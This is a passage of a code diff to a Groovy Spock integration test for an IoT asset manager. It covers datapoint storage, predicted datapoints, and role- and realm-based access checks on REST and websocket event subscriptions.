+      assert aggregatedDatapoints.size() == 13
+      assert aggregatedDatapoints[11].value, closeTo(13.36666, 0.0001)
+      assert aggregatedDatapoints[12].value == 14.95
+    }
+
+
+    // ------------------------------------
+    // Test boolean data point storage
+    // ------------------------------------
+
+    when: "a simulated boolean sensor receives a new value"
+    advancePseudoClock(1, MINUTES, container)
+    datapoint1ExpectedTimestamp = getClockTimeOf(container)
+    simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, thingLightToggleAttributeName), false)
+
+    then: "the attribute should be updated"
+    conditions.eventually {
+      def thing = assetStorageService.find(managerTestSetup.thingId, true)
+      assert !thing.getAttribute(thingLightToggleAttributeName).flatMap {
+        it.getValue(Boolean.class)
+      }.orElse(null)
+    }
+
+    when: "a simulated sensor receives a new value"
+    advancePseudoClock(1, MINUTES, container)
+    datapoint2ExpectedTimestamp = getClockTimeOf(container)
+    simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, thingLightToggleAttributeName), true)
+
+    then: "the attribute should be updated"
+    conditions.eventually {
+      def thing = assetStorageService.find(managerTestSetup.thingId, true)
+      assert thing.getAttribute(thingLightToggleAttributeName).flatMap {
+        it.getValue(Boolean.class)
+      }.orElse(null)
+    }
+
+    when: "a simulated sensor receives a new value"
+    advancePseudoClock(1, MINUTES, container)
+    datapoint3ExpectedTimestamp = getClockTimeOf(container)
+    simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, thingLightToggleAttributeName), false)
+
+    then: "the attribute should be updated"
+    conditions.eventually {
+      def thing = assetStorageService.find(managerTestSetup.thingId, true)
+      assert !thing.getAttribute(thingLightToggleAttributeName).flatMap {
+        it.getValue(Boolean.class)
+      }.orElse(null)
+    }
+
+    expect: "the datapoints to be stored"
+    conditions.eventually {
+      //def datapoints = datapointResource.getDatapoints(null, managerTestSetup.thingId, thingLightToggleAttributeName, null) as List
+      def datapoints = assetDatapointService.getDatapoints(new AttributeRef(managerTestSetup.thingId, thingLightToggleAttributeName))
+      assert datapoints.size() >= 3
+
+      assert !ValueUtil.getBoolean(datapoints.get(0).value).orElse(null)
+      assert datapoints.get(0).timestamp == datapoint3ExpectedTimestamp
+
+      assert datapoints.any {
+        it.timestamp == datapoint3ExpectedTimestamp && !(it.value as Boolean)
+      }
+      assert datapoints.any {
+        it.timestamp == datapoint2ExpectedTimestamp && (it.value as Boolean)
+      }
+      assert datapoints.any {
+        it.timestamp == datapoint3ExpectedTimestamp && !(it.value as Boolean)
+      }
+    }
+
+    and: "the aggregated datapoints should match"
+    conditions.eventually {
+      def thing = assetStorageService.find(managerTestSetup.thingId, true)
+      //def aggregatedDatapoints = datapointResource.getDatapoints(
+      def aggregatedDatapoints = assetDatapointService.queryDatapoints(
+              thing.getId(),
+              thingLightToggleAttributeName,
+              new AssetDatapointIntervalQuery(
+                      Instant.ofEpochMilli(getClockTimeOf(container)).atZone(ZoneId.systemDefault()).toLocalDateTime().minus(1, ChronoUnit.HOURS),
+                      Instant.ofEpochMilli(getClockTimeOf(container)).atZone(ZoneId.systemDefault()).toLocalDateTime(),
+                      "MINUTE",
+                      AssetDatapointIntervalQuery.Formula.AVG,
+                      true
+                      )
+              )
+      assert aggregatedDatapoints.size() == 61
+      assert aggregatedDatapoints[58].value == 0
+      assert aggregatedDatapoints[59].value == 1d
+      assert aggregatedDatapoints[60].value == 0
+    }
+
+    // ------------------------------------
+    // Test logging of outdated data points
+    // ------------------------------------
+
+    when: "a simulated sensor receives a new outdated value"
+    simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, thingLightToggleAttributeName), true, getClockTimeOf(container)-5000)
+
+    then: "the datapoint should be stored"
+    conditions.eventually {
+      def datapoints = assetDatapointService.getDatapoints(new AttributeRef(managerTestSetup.thingId, thingLightToggleAttributeName))
+      assert datapoints.any {
+        it.timestamp == getClockTimeOf(container)-5000 && (it.value as Boolean)
+      }
+    }
+
+    and: "the attribute should not be updated"
+    conditions.eventually {
+      def thing = assetStorageService.find(managerTestSetup.thingId, true)
+      assert !thing.getAttribute(thingLightToggleAttributeName).flatMap {
+        it.getValue(Boolean.class)
+      }.orElse(true)
+      assert thing.getAttribute(thingLightToggleAttributeName).flatMap {
+        it.getTimestamp()
+      }.orElse(0) == getClockTimeOf(container)
+    }
+
+    when: "we subscribe to predicted data points events"
+    List<AssetPredictedDatapointEvent> predictedEvents = new CopyOnWriteArrayList<>()
+    Consumer<AssetPredictedDatapointEvent> predictedEventConsumer = { event ->
+      predictedEvents.add(event)
+    }
+    clientEventService.addSubscription(AssetPredictedDatapointEvent.class, null, predictedEventConsumer)
+
+    and: "predicted data points are added"
+    predictedDatapointResource.writePredictedDatapoints(null, managerTestSetup.thingId, "light1PowerConsumption",
+            [
+              new ValueDatapoint<>(getClockTimeOf(container)+60000, 10d),
+              new ValueDatapoint<>(getClockTimeOf(container)+120000, 20d),
+              new ValueDatapoint<>(getClockTimeOf(container)+180000, 30d),
+              new ValueDatapoint<>(getClockTimeOf(container)+240000, 40d),
+              new ValueDatapoint<>(getClockTimeOf(container)+300000, 50d)
+            ] as ValueDatapoint<?>[]
+            )
+    predictedDatapointResource.writePredictedDatapoints(null, managerTestSetup.thingId, thingLightToggleAttributeName,
+            [
+              new ValueDatapoint<>(getClockTimeOf(container)+60000, true),
+              new ValueDatapoint<>(getClockTimeOf(container)+120000, true),
+              new ValueDatapoint<>(getClockTimeOf(container)+180000, true),
+              new ValueDatapoint<>(getClockTimeOf(container)+240000, false),
+              new ValueDatapoint<>(getClockTimeOf(container)+300000, false)
+            ] as ValueDatapoint<?>[]
+            )
+
+    then: "the predicted data should be available"
+    def predictedData = assetPredictedDatapointService.getDatapoints(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"))
+    assert predictedData.size() == 5
+    assert predictedData.any {it.value == 20d}
+
+    and: "an event should be published for predicted datapoints"
+    conditions.eventually {
+      assert predictedEvents.any {
+        it.ref.id == managerTestSetup.thingId &&
+        it.ref.name == "light1PowerConsumption"
+      }
+      assert predictedEvents.any {
+        it.ref.id == managerTestSetup.thingId &&
+        it.ref.name == thingLightToggleAttributeName
+      }
+    }
+
+    when: "the predicted data is purged and then retrieved"
+    assetPredictedDatapointService.purgeValues(managerTestSetup.thingId, "light1PowerConsumption")
+    predictedData = assetPredictedDatapointService.getDatapoints(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"))
+
+    then: "no predicted data should remain for this attribute"
+    assert predictedData.isEmpty()
+
+    and: "an event should be published"
+    conditions.eventually {
+      assert predictedEvents.any {
+        it.ref.id == managerTestSetup.thingId &&
+        it.ref.name == "light1PowerConsumption"
+      }
+    }
+
+    when: "other predicted data is retrieved"
+    predictedData = assetPredictedDatapointService.getDatapoints(new AttributeRef(managerTestSetup.thingId, thingLightToggleAttributeName))
+
+    then: "predicted data should remain for this attribute"
+    assert predictedData.size() == 5
+    assert predictedData.count {it.value == false} == 2
+  }
+
+  def "Test anonymous predicted datapoint writes are allowed for public write attributes"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+
+    and: "the manager container and test setup are available"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+
+    and: "a public-write-only attribute exists on a public asset"
+    def attributeName = "predictedPublicWrite"
+    def apartment1 = assetStorageService.find(managerTestSetup.apartment1Id, true)
+    apartment1.getAttributes().addOrReplace(
+            new Attribute<>(attributeName, ValueType.NUMBER, 0d)
+            .addMeta(new MetaItem<>(ACCESS_PUBLIC_WRITE, true))
+            )
+    assetStorageService.merge(apartment1)
+
+    and: "an anonymous predicted datapoint API client"
+    def predictedDatapointResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name).proxy(AssetPredictedDatapointResource.class)
+
+    when: "an anonymous predicted datapoint write is made"
+    predictedDatapointResource.writePredictedDatapoints(
+            null,
+            managerTestSetup.apartment1Id,
+            attributeName,
+            [new ValueDatapoint<>(getClockTimeOf(container) + 60000, 12d)] as ValueDatapoint<?>[]
+            )
+
+    then: "the predicted datapoint should be stored"
+    conditions.eventually {
+      def predictedData = assetPredictedDatapointService.getDatapoints(new AttributeRef(managerTestSetup.apartment1Id, attributeName))
+      assert predictedData.size() == 1
+      assert predictedData[0].value == 12d
+    }
+  }
+
+  def "Test predicted datapoint writes are denied without WRITE_ATTRIBUTES role"() {
+    given: "the manager container and test setup are available"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "a building user with READ_ASSETS but without WRITE_ATTRIBUTES"
+    def accessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser2",
+            "testuser2"
+            )
+    def predictedDatapointResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(AssetPredictedDatapointResource.class)
+
+    when: "the user writes predicted datapoints"
+    predictedDatapointResource.writePredictedDatapoints(
+            null,
+            managerTestSetup.apartment1LivingroomId,
+            "targetTemperature",
+            [new ValueDatapoint<>(getClockTimeOf(container) + 60000, 19d)] as ValueDatapoint<?>[]
+            )
+
+    then: "access should be forbidden"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+  }
+
+  def "Test restricted predicted datapoint writes require restricted write meta"() {
+    given: "the manager container and test setup are available"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "a restricted user with linked assets"
+    def accessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser3",
+            "testuser3"
+            )
+    def predictedDatapointResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(AssetPredictedDatapointResource.class)
+
+    when: "the restricted user writes a predicted datapoint for an attribute without restricted write access"
+    predictedDatapointResource.writePredictedDatapoints(
+            null,
+            managerTestSetup.apartment1Id,
+            BuildingAsset.STREET.name,
+            [new ValueDatapoint<>(getClockTimeOf(container) + 60000, "should fail")] as ValueDatapoint<?>[]
+            )
+
+    then: "access should be forbidden"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+  }
+
+  def "Test predicted datapoint change events are received via websocket API"() {
+
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+
+    and: "the manager container and test setup are available"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+
+    and: "an authenticated predicted datapoint API client"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            "testuser1",
+            "testuser1"
+            )
+    def predictedDatapointResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetPredictedDatapointResource.class)
+
+    and: "a websocket client authenticated in the same realm"
+    def client = new WebsocketIOClient<String>(
             new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=master").build(),
             null,
             new OAuthPasswordGrant(
-                "http://127.0.0.1:$serverPort/auth/realms/master/protocol/openid-connect/token",
-                KEYCLOAK_CLIENT_ID,
-                null,
-                null,
-                "testuser1",
-                "testuser1"
+                    "http://127.0.0.1:$serverPort/auth/realms/master/protocol/openid-connect/token",
+                    KEYCLOAK_CLIENT_ID,
+                    null,
+                    null,
+                    "testuser1",
+                    "testuser1"
+                    )
             )
-        )
-        client.setEncoderDecoderProvider({
-            [
-                new StringEncoder(CharsetUtil.UTF_8),
-                new StringDecoder(CharsetUtil.UTF_8),
-                new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client)
-            ].toArray(new ChannelHandler[0])
-        })
+    client.setEncoderDecoderProvider({
+      [
+        new StringEncoder(CharsetUtil.UTF_8),
+        new StringDecoder(CharsetUtil.UTF_8),
+        new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client)
+      ].toArray(new ChannelHandler[0])
+    })
 
-        and: "message and connection listeners are configured"
-        def connectionStatus = client.getConnectionStatus()
-        List<Object> receivedMessages = new CopyOnWriteArrayList<>()
-        client.addMessageConsumer(message -> receivedMessages.add(messageFromString(message)))
-        client.addConnectionStatusConsumer(status -> connectionStatus = status)
+    and: "message and connection listeners are configured"
+    def connectionStatus = client.getConnectionStatus()
+    List<Object> receivedMessages = new CopyOnWriteArrayList<>()
+    client.addMessageConsumer(message -> receivedMessages.add(messageFromString(message)))
+    client.addConnectionStatusConsumer(status -> connectionStatus = status)
 
-        when: "the websocket client connects and subscribes to predicted datapoint events"
-        client.connect()
+    when: "the websocket client connects and subscribes to predicted datapoint events"
+    client.connect()
 
-        then: "the websocket should be connected"
-        conditions.eventually {
-            assert client.connectionStatus == ConnectionStatus.CONNECTED
-            assert connectionStatus == ConnectionStatus.CONNECTED
-        }
+    then: "the websocket should be connected"
+    conditions.eventually {
+      assert client.connectionStatus == ConnectionStatus.CONNECTED
+      assert connectionStatus == ConnectionStatus.CONNECTED
+    }
 
-        when: "the predicted datapoint event subscription is sent"
-        client.sendMessage(messageToString(
-            EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
-            new EventSubscription(AssetPredictedDatapointEvent.class, null, "predicted-datapoints")
-        ))
+    when: "the predicted datapoint event subscription is sent"
+    client.sendMessage(messageToString(
+                    EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
+                    new EventSubscription(AssetPredictedDatapointEvent.class, null, "predicted-datapoints")
+                    ))
 
-        then: "the server should confirm subscription"
-        conditions.eventually {
-            assert receivedMessages.any {
-                it instanceof EventSubscription &&
-                    it.subscriptionId == "predicted-datapoints"
-            }
-        }
+    then: "the server should confirm subscription"
+    conditions.eventually {
+      assert receivedMessages.any {
+        it instanceof EventSubscription &&
+        it.subscriptionId == "predicted-datapoints"
+      }
+    }
 
-        when: "a predicted datapoint change is written"
-        receivedMessages.clear()
-        predictedDatapointResource.writePredictedDatapoints(
+    when: "a predicted datapoint change is written"
+    receivedMessages.clear()
+    predictedDatapointResource.writePredictedDatapoints(
             null,
             managerTestSetup.thingId,
             "light1PowerConsumption",
             [new ValueDatapoint<>(getClockTimeOf(container) + 60000, 42d)] as ValueDatapoint<?>[]
-        )
+            )
 
-        then: "the websocket subscription should receive the corresponding triggered event"
-        conditions.eventually {
-            assert receivedMessages.any {
-                it instanceof TriggeredEventSubscription &&
-                    it.subscriptionId == "predicted-datapoints" &&
-                    it.events.any { event ->
-                        event instanceof AssetPredictedDatapointEvent &&
-                            event.ref.id == managerTestSetup.thingId &&
-                            event.ref.name == "light1PowerConsumption"
-                    }
-            }
+    then: "the websocket subscription should receive the corresponding triggered event"
+    conditions.eventually {
+      assert receivedMessages.any {
+        it instanceof TriggeredEventSubscription &&
+        it.subscriptionId == "predicted-datapoints" &&
+        it.events.any { event ->
+          event instanceof AssetPredictedDatapointEvent &&
+          event.ref.id == managerTestSetup.thingId &&
+          event.ref.name == "light1PowerConsumption"
         }
-
-        cleanup: "the websocket client is disconnected"
-        if (client != null) {
-            client.disconnect()
-        }
+      }
     }
 
-    def "Test predicted datapoint websocket subscription is denied without READ_ASSETS role"() {
+    cleanup: "the websocket client is disconnected"
+    if (client != null) {
+      client.disconnect()
+    }
+  }
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+  def "Test predicted datapoint websocket subscription is denied without READ_ASSETS role"() {
 
-        and: "the manager container and setup are available"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def identityService = container.getService(ManagerIdentityService.class)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
 
-        and: "a regular building user has READ_ASSETS removed"
-        identityService.getIdentityProvider().updateUserClientRoles(
+    and: "the manager container and setup are available"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def identityService = container.getService(ManagerIdentityService.class)
+
+    and: "a regular building user has READ_ASSETS removed"
+    identityService.getIdentityProvider().updateUserClientRoles(
             keycloakTestSetup.realmBuilding.name,
             keycloakTestSetup.testuser2Id,
             KEYCLOAK_CLIENT_ID,
             ClientRole.WRITE_USER.value,
             ClientRole.READ_MAP.value
-        )
+            )
 
-        and: "a websocket client authenticated as that user"
-        def client = createPredictedDatapointWebsocketClient(serverPort, "building", "building", "testuser2", "testuser2")
-        List<Object> receivedMessages = new CopyOnWriteArrayList<>()
-        client.addMessageConsumer(message -> receivedMessages.add(messageFromString(message)))
+    and: "a websocket client authenticated as that user"
+    def client = createPredictedDatapointWebsocketClient(serverPort, "building", "building", "testuser2", "testuser2")
+    List<Object> receivedMessages = new CopyOnWriteArrayList<>()
+    client.addMessageConsumer(message -> receivedMessages.add(messageFromString(message)))
 
-        when: "the websocket client connects and subscribes to predicted datapoint events"
-        client.connect()
-        conditions.eventually {
-            assert client.connectionStatus == ConnectionStatus.CONNECTED
-        }
+    when: "the websocket client connects and subscribes to predicted datapoint events"
+    client.connect()
+    conditions.eventually {
+      assert client.connectionStatus == ConnectionStatus.CONNECTED
+    }
 
-        client.sendMessage(messageToString(
-            EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
-            new EventSubscription(AssetPredictedDatapointEvent.class, null, "predicted-no-read-assets")
-        ))
+    client.sendMessage(messageToString(
+                    EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
+                    new EventSubscription(AssetPredictedDatapointEvent.class, null, "predicted-no-read-assets")
+                    ))
 
-        then: "the server should reject subscription"
-        conditions.eventually {
-            assert receivedMessages.any {
-                it instanceof UnauthorizedEventSubscription &&
-                    it.subscription.subscriptionId == "predicted-no-read-assets"
-            }
-        }
+    then: "the server should reject subscription"
+    conditions.eventually {
+      assert receivedMessages.any {
+        it instanceof UnauthorizedEventSubscription &&
+        it.subscription.subscriptionId == "predicted-no-read-assets"
+      }
+    }
 
-        cleanup: "the websocket client is disconnected and original roles are restored"
-        identityService.getIdentityProvider().updateUserClientRoles(
+    cleanup: "the websocket client is disconnected and original roles are restored"
+    identityService.getIdentityProvider().updateUserClientRoles(
             keycloakTestSetup.realmBuilding.name,
             keycloakTestSetup.testuser2Id,
             KEYCLOAK_CLIENT_ID,
             ClientRole.WRITE_USER.value,
             ClientRole.READ_MAP.value,
             ClientRole.READ_ASSETS.value
-        )
-        if (client != null) {
-            client.disconnect()
-        }
+            )
+    if (client != null) {
+      client.disconnect()
     }
+  }
 
-    def "Test predicted datapoint websocket subscription is denied for a different realm"() {
+  def "Test predicted datapoint websocket subscription is denied for a different realm"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
 
-        and: "the manager container is available"
-        def container = startContainer(defaultConfig(), defaultServices())
+    and: "the manager container is available"
+    def container = startContainer(defaultConfig(), defaultServices())
 
-        and: "a building realm websocket client requests subscriptions in master realm"
-        def client = createPredictedDatapointWebsocketClient(serverPort, "master", "building", "testuser2", "testuser2")
-        List<Object> receivedMessages = new CopyOnWriteArrayList<>()
-        client.addMessageConsumer(message -> receivedMessages.add(messageFromString(message)))
+    and: "a building realm websocket client requests subscriptions in master realm"
+    def client = createPredictedDatapointWebsocketClient(serverPort, "master", "building", "testuser2", "testuser2")
+    List<Object> receivedMessages = new CopyOnWriteArrayList<>()
+    client.addMessageConsumer(message -> receivedMessages.add(messageFromString(message)))
 
-        when: "the websocket client connects and subscribes to predicted datapoint events"
-        client.connect()
+    when: "the websocket client connects and subscribes to predicted datapoint events"
+    client.connect()
 
-        then: "the websocket session should never be established in a realm where the user does not belong"
-        assert client.connectionStatus != ConnectionStatus.CONNECTED
-        assert receivedMessages.isEmpty()
+    then: "the websocket session should never be established in a realm where the user does not belong"
+    assert client.connectionStatus != ConnectionStatus.CONNECTED
+    assert receivedMessages.isEmpty()
 
-        cleanup: "the websocket client is disconnected"
-        if (client != null) {
-            client.disconnect()
-        }
+    cleanup: "the websocket client is disconnected"
+    if (client != null) {
+      client.disconnect()
     }
+  }
 
-    def "Test restricted user does not receive predicted datapoint events for unlinked assets"() {
+  def "Test restricted user does not receive predicted datapoint events for unlinked assets"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
 
-        and: "the manager container and setup are available"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def identityService = container.getService(ManagerIdentityService.class)
+    and: "the manager container and setup are available"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def identityService = container.getService(ManagerIdentityService.class)
 
-        and: "the limited building user has attribute write permission for producing predicted datapoint events"
-        identityService.getIdentityProvider().updateUserClientRoles(
+    and: "the limited building user has attribute write permission for producing predicted datapoint events"
+    identityService.getIdentityProvider().updateUserClientRoles(
             keycloakTestSetup.realmBuilding.name,
             keycloakTestSetup.testuser2Id,
             KEYCLOAK_CLIENT_ID,
@@ -743,103 +771,103 @@ class AssetDatapointTest extends Specification implements ManagerContainerTrait 
             ClientRole.READ_MAP.value,
             ClientRole.READ_ASSETS.value,
             ClientRole.WRITE_ATTRIBUTES.value
-        )
+            )
 
-        and: "a limited building realm predicted datapoint API client"
-        def accessToken = authenticate(
+    and: "a limited building realm predicted datapoint API client"
+    def accessToken = authenticate(
             container,
             "building",
             KEYCLOAK_CLIENT_ID,
             "testuser2",
             "testuser2"
-        )
-        def predictedDatapointResource = getClientApiTarget(serverUri(serverPort), "building", accessToken).proxy(AssetPredictedDatapointResource.class)
+            )
+    def predictedDatapointResource = getClientApiTarget(serverUri(serverPort), "building", accessToken).proxy(AssetPredictedDatapointResource.class)
 
-        and: "a restricted websocket client in the same realm"
-        def client = createPredictedDatapointWebsocketClient(serverPort, "building", "building", "testuser3", "testuser3")
-        List<Object> receivedMessages = new CopyOnWriteArrayList<>()
-        client.addMessageConsumer(message -> receivedMessages.add(messageFromString(message)))
+    and: "a restricted websocket client in the same realm"
+    def client = createPredictedDatapointWebsocketClient(serverPort, "building", "building", "testuser3", "testuser3")
+    List<Object> receivedMessages = new CopyOnWriteArrayList<>()
+    client.addMessageConsumer(message -> receivedMessages.add(messageFromString(message)))
 
-        when: "the websocket client connects and subscribes to predicted datapoint events"
-        client.connect()
-        conditions.eventually {
-            assert client.connectionStatus == ConnectionStatus.CONNECTED
-        }
+    when: "the websocket client connects and subscribes to predicted datapoint events"
+    client.connect()
+    conditions.eventually {
+      assert client.connectionStatus == ConnectionStatus.CONNECTED
+    }
 
-        client.sendMessage(messageToString(
-            EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
-            new EventSubscription(AssetPredictedDatapointEvent.class, null, "predicted-restricted-unlinked")
-        ))
+    client.sendMessage(messageToString(
+                    EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
+                    new EventSubscription(AssetPredictedDatapointEvent.class, null, "predicted-restricted-unlinked")
+                    ))
 
-        and: "a predicted datapoint update is written on a linked and restricted attribute"
-        receivedMessages.clear()
-        predictedDatapointResource.writePredictedDatapoints(
+    and: "a predicted datapoint update is written on a linked and restricted attribute"
+    receivedMessages.clear()
+    predictedDatapointResource.writePredictedDatapoints(
             null,
             managerTestSetup.apartment1LivingroomId,
             "targetTemperature",
             [new ValueDatapoint<>(getClockTimeOf(container) + 60000, 22d)] as ValueDatapoint<?>[]
-        )
+            )
 
-        then: "the restricted user should receive the linked attribute event"
-        conditions.eventually {
-            assert receivedMessages.any {
-                it instanceof TriggeredEventSubscription &&
-                    it.subscriptionId == "predicted-restricted-unlinked" &&
-                    it.events.any { event ->
-                        event instanceof AssetPredictedDatapointEvent &&
-                            event.ref.id == managerTestSetup.apartment1LivingroomId &&
-                            event.ref.name == "targetTemperature"
-                    }
-            }
+    then: "the restricted user should receive the linked attribute event"
+    conditions.eventually {
+      assert receivedMessages.any {
+        it instanceof TriggeredEventSubscription &&
+        it.subscriptionId == "predicted-restricted-unlinked" &&
+        it.events.any { event ->
+          event instanceof AssetPredictedDatapointEvent &&
+          event.ref.id == managerTestSetup.apartment1LivingroomId &&
+          event.ref.name == "targetTemperature"
         }
+      }
+    }
 
-        when: "a predicted datapoint update is written on an unlinked asset"
-        receivedMessages.clear()
-        predictedDatapointResource.writePredictedDatapoints(
+    when: "a predicted datapoint update is written on an unlinked asset"
+    receivedMessages.clear()
+    predictedDatapointResource.writePredictedDatapoints(
             null,
             managerTestSetup.apartment2LivingroomId,
             "targetTemperature",
             [new ValueDatapoint<>(getClockTimeOf(container) + 60000, 21d)] as ValueDatapoint<?>[]
-        )
+            )
 
-        then: "no triggered event should be received by the restricted user"
-        assert receivedMessages.every {
-            !(it instanceof TriggeredEventSubscription) || it.subscriptionId != "predicted-restricted-unlinked"
-        }
+    then: "no triggered event should be received by the restricted user"
+    assert receivedMessages.every {
+      !(it instanceof TriggeredEventSubscription) || it.subscriptionId != "predicted-restricted-unlinked"
+    }
 
-        cleanup: "the websocket client is disconnected and original roles are restored"
-        identityService.getIdentityProvider().updateUserClientRoles(
+    cleanup: "the websocket client is disconnected and original roles are restored"
+    identityService.getIdentityProvider().updateUserClientRoles(
             keycloakTestSetup.realmBuilding.name,
             keycloakTestSetup.testuser2Id,
             KEYCLOAK_CLIENT_ID,
             ClientRole.WRITE_USER.value,
             ClientRole.READ_MAP.value,
             ClientRole.READ_ASSETS.value
-        )
-        if (client != null) {
-            client.disconnect()
-        }
+            )
+    if (client != null) {
+      client.disconnect()
     }
+  }
 
-    def "Test restricted user does not receive predicted datapoint events for non-restricted attributes"() {
+  def "Test restricted user does not receive predicted datapoint events for non-restricted attributes"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
 
-        and: "the manager container and setup are available"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def identityService = container.getService(ManagerIdentityService.class)
+    and: "the manager container and setup are available"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def identityService = container.getService(ManagerIdentityService.class)
 
-        and: "a non-restricted attribute exists on an asset linked to the restricted user"
-        def apartment1 = assetStorageService.find(managerTestSetup.apartment1Id, true)
-        apartment1.getAttributes().addOrReplace(new Attribute<>("predictedNonRestricted", ValueType.NUMBER, 0d))
-        assetStorageService.merge(apartment1)
+    and: "a non-restricted attribute exists on an asset linked to the restricted user"
+    def apartment1 = assetStorageService.find(managerTestSetup.apartment1Id, true)
+    apartment1.getAttributes().addOrReplace(new Attribute<>("predictedNonRestricted", ValueType.NUMBER, 0d))
+    assetStorageService.merge(apartment1)
 
-        and: "the limited building user has attribute write permission for producing predicted datapoint events"
-        identityService.getIdentityProvider().updateUserClientRoles(
+    and: "the limited building user has attribute write permission for producing predicted datapoint events"
+    identityService.getIdentityProvider().updateUserClientRoles(
             keycloakTestSetup.realmBuilding.name,
             keycloakTestSetup.testuser2Id,
             KEYCLOAK_CLIENT_ID,
@@ -847,81 +875,81 @@ class AssetDatapointTest extends Specification implements ManagerContainerTrait 
             ClientRole.READ_MAP.value,
             ClientRole.READ_ASSETS.value,
             ClientRole.WRITE_ATTRIBUTES.value
-        )
+            )
 
-        and: "a limited building realm predicted datapoint API client"
-        def accessToken = authenticate(
+    and: "a limited building realm predicted datapoint API client"
+    def accessToken = authenticate(
             container,
             "building",
             KEYCLOAK_CLIENT_ID,
             "testuser2",
             "testuser2"
-        )
-        def predictedDatapointResource = getClientApiTarget(serverUri(serverPort), "building", accessToken).proxy(AssetPredictedDatapointResource.class)
+            )
+    def predictedDatapointResource = getClientApiTarget(serverUri(serverPort), "building", accessToken).proxy(AssetPredictedDatapointResource.class)
 
-        and: "a restricted websocket client in the same realm"
-        def client = createPredictedDatapointWebsocketClient(serverPort, "building", "building", "testuser3", "testuser3")
-        List<Object> receivedMessages = new CopyOnWriteArrayList<>()
-        client.addMessageConsumer(message -> receivedMessages.add(messageFromString(message)))
+    and: "a restricted websocket client in the same realm"
+    def client = createPredictedDatapointWebsocketClient(serverPort, "building", "building", "testuser3", "testuser3")
+    List<Object> receivedMessages = new CopyOnWriteArrayList<>()
